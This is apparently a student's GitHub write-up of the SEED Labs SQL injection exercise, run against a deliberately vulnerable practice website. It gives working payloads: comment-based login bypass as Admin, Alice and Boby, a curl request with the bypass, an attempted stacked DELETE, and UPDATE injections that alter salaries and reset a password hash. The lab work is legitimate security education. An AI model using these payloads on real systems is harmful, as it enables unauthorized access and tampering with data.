Seed-Lab-Sql-Injection-Attack

SQL injection attack

Name	Title
Asad Ali	Seed Lab SQL Injection

Instruction: https://seedsecuritylabs.org/Labs_16.04/PDF/Web_SQL_Injection.pdf

Task 1

Login to MYSQL

sudo mysql -u root -pseedubuntu

Use Users Database from Databases

mysql> use Users;

Showing Tables from Users Database

mysql> show Tables;

Select Name="Alice" from Users Database

mysql> select * from credential where Name = 'Alice';

Task 2

Task2.1

Username "Admin'#"
Password "abc" It will result in a SQL query as:

SELECT id, name, eid, salary, birth, ssn, address, email,
nickname, Password
FROM credential
WHERE name= 'Admin' #' and Password='abc'

Then statements after # will be regarded as comments. So we can log in as Admin.

Task 2.2

curl 'http://www.seedlabsqlinjection.com/unsafe_home.php?username=Admin%27%20%23Password=xyz'

Task 2.3

Now we use SQL query to update data using same vulnerability

'1=1; DELETE from credential where name='Alice';

So

USERNAME : '1=1; DELETE from credential where name='Alice';
PASSWORD : ""

As result

Because in PHP's mysqli extension, which invokes mysqli::query API to handle SQL statements, it doesn't support for multiple queries within the same run. Of course, the design of this API attributes to the concern of SQL injection.

Task 3

It's hard to find the navigation buttons on this website (www.SeedLabSQLInjection.com). In order to edit the profile, please log in and then jump to the link address: http://www.seedlabsqlinjection.com/unsafe_edit_frontend.php by hand.

Task 3.1

Log in with Alice's

USERNAME : "Alice'#"
PASSWORD : ""

Than enter http://www.seedlabsqlinjection.com/unsafe_edit_frontend.php

Than Modify Phone Number as ', Salary=1000000 # and save.

Task 3.2

Log in with Boby

USERNAME : "Boby'#"
PASSWORD : ""

Than enter http://www.seedlabsqlinjection.com/unsafe_edit_frontend.php

Than Modify Phone Number as ', Salary=0 # and save.

Task 3.3

The simplest approach is to log-in as Alice like Task 3.1 and change the password. Log in with Boby

USERNAME : "Alice'#"
PASSWORD : ""

Than enter http://www.seedlabsqlinjection.com/unsafe_edit_frontend.php

Assume we want to change Alice's password as 12345. First, we should get SHA1 value of our new password via Terminal using Command

echo "12345"|sha1sum

So our SHA1 code is

2672275fe0c456fb671e4f417fb2f9892c7573ba

Than Modify Phone Number as ', password='2672275fe0c456fb671e4f417fb2f9892c7573ba' where name='Alice' # and save.

now you login to Alice

USERNAME : Alice
PASSWORD : 12345

Name		Name	Last commit message	Last commit date
Latest commit History 18 Commits
Alice pass update.PNG		Alice pass update.PNG
Boby profile.PNG		Boby profile.PNG
README.md		README.md
alice profile.PNG		alice profile.PNG
curl url.PNG		curl url.PNG
hash pass.PNG		hash pass.PNG
modify alice number.PNG		modify alice number.PNG
mysql query.PNG		mysql query.PNG
salary of boby change.PNG		salary of boby change.PNG
select query.PNG		select query.PNG
show table.PNG		show table.PNG
task 2.3 use delete query.PNG		task 2.3 use delete query.PNG
use users.PNG		use users.PNG
users details.PNG		users details.PNG

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

Seed-Lab-Sql-Injection-Attack

Task 1

Login to MYSQL

Use Users Database from Databases

Showing Tables from Users Database

Select Name="Alice" from Users Database

Task 2

Task2.1

Task 2.2

Task 2.3

Task 3

Task 3.1

Task 3.2

Task 3.3

About

Uh oh!

Releases

Packages

Asad-Ali-Code/Seed-Lab-Sql-Injection-Attack

Folders and files

Latest commit

History

Repository files navigation

Seed-Lab-Sql-Injection-Attack

Task 1

Login to MYSQL

Use Users Database from Databases

Showing Tables from Users Database

Select Name="Alice" from Users Database

Task 2

Task2.1

Task 2.2

Task 2.3

Task 3

Task 3.1

Task 3.2

Task 3.3

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Packages